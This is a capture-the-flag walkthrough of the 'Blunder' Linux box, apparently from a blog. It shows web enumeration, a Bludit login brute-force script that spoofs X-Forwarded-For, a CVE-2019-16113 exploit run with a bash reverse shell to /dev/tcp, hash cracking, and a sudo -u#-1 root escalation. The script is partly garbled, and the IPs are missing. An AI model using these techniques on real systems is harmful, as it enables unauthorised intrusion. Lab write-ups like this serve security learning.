Blunder is Linux box which having IP address, Let’s start with nmap scan and some enumeration part.


Nmap scan report for
Host is up (0.32s latency).
Not shown: 998 filtered ports
21/tcp closed ftp
80/tcp open   http?
|_http-generator: Blunder
| http-methods:
|_  Supported Methods: OPTIONS
|_http-title: Blunder | A blunder of interesting facts


python3 -u -e *
[11:44:57] Starting[11:45:01] 200 -    7KB - /%3f/            
[11:45:10] 200 -  563B  - /.gitignore                                               
[11:45:30] 200 -    7KB - /0                                                    
[11:45:56] 200 -    3KB - /about                               
[11:46:04] 301 -    0B  - /admin  ->      
[11:46:08] 200 -    2KB - /admin/                     
[11:46:08] 200 -    2KB - /admin/.config


wfuzz -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt --hc 404,403 -u ""
* Wfuzz 2.4.5 - The Web Fuzzer                         *
Total requests: 4658
ID           Response   Lines    Word     Chars       Payload                                                    
000003519:   200        1 L      4 W      22 Ch    "robots"                                                    
000004125:   200        4 L      23 W     118 Ch      "todo"                                                     

Dig into todo.txt

-Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING

And we found username Fergus of admin panel and got hint about Bludit CMS. Now tried for password guessing but didn’t work, try the common methodology create wordlist using cewl and try to bruteforce.


cewl -w passwords.txt -d 10 -m 1

Tried different tools for brute force but didn’t work because of Bludit brute force mitigation

!/usr/bin/env python3
import re
import requests
from future import print_function
def open_ressources(file_path):
return [item.replace("\n", "") for item in open(file_path).readlines()]
host = ''
login_url = host + '/admin/login'
username = 'fergus'
wordlist = open_ressources('/home/kali/passwords.txt')
for password in wordlist:
session = requests.Session()
login_page = session.get(login_url)
csrf_token ='input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)
print('[*] Trying: {p}'.format(p = password)) headers = { 'X-Forwarded-For': password, 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36', 'Referer': login_url } data = { 'tokenCSRF': csrf_token, 'username': username, 'password': password, 'save': '' } login_result =, headers = headers, data = data, allow_redirects = False) if 'location' in login_result.headers: if '/admin/dashboard' in login_result.headers['location']: print() print('SUCCESS: Password found!') print('Use {u}:{p} to login.'.format(u = username, p = password)) print() break

 And got fergus:RolandDeschain login into CMS Bludit, Check for CVE for Bludit CMS and got CVE-2019-16113 // this exploit written in python as well as you can go with the Metasploit framework

I used exploit from github.

python3 -u -user fergus -pass RolandDeschain -c "bash -c 'bash -i >& /dev/tcp/ 0>&1'"

Listen for specific port in this case 1337

nc -lvp 1337

After got reverse shell, try to dig into some files /var/www/bludit-3.10.0a/bl-content/databases/ in this directory there is users.php file

There is hash value, first try to identify it and it’s SHA1 then try to crack it online 

faca404fd5c0a31cf1897b823c695c85cffeb98d : Password120


[email protected]:/var/www/bludit-3.9.2/bl-content/tmp$ su hugo
su hugo
Password: Password120
cat user.txt

Now try simple method for getting root, tried sudo -l and got message (ALL, !root) /bin/bash.

Simple try google (ALL, !root) /bin/bash and got


$ sudo -u#-1 /bin/bash
sudo -u#-1 /bin/bash
Password: Password120
[email protected]:/root# cat root.txt
cat root.txt

Hope you Enjoy it 😀


Please enter your comment!
Please enter your name here